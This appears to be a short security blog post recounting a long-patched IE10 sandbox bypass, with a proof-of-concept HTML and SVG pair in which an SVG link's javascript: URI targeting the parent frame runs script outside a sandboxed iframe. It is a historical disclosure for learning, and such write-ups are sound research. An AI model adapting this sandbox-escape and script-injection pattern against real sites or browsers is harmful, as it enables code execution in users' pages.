IE10 Sandbox Bypass via SVG JavaScript xLink

I was lucky to find this one. A fully sandboxed iframe — no flags at all — could execute JavaScript in the parent window simply by embedding an SVG file with a javascript: xlink targeting _parent. Clicking the link ran arbitrary code in the parent’s context with no restrictions.

<!-- index.html -->
<iframe sandbox src="sandboxed.svg"></iframe>

<!-- sandboxed.svg -->
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <a xlink:href="javascript:alert(document.body.innerText)" target="_parent">
    <text x="60" y="50" fill="blue">I'm fully SandBoxed, but CLICK ME ...</text>
  </a>
</svg>

The sandbox was correctly applied to the iframe, but SVG’s xlink:href with a javascript: URI and target="_parent" was not being blocked. When the user clicked the link, the JavaScript ran in the parent frame’s context, completely outside the sandbox. A variation using an HTML file with a JavaScript link was filed separately.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [IE10 Sandbox ms-allow-popups Bypass] :: [IE10 Sandbox allow-same-origin Bypass via XML Island] >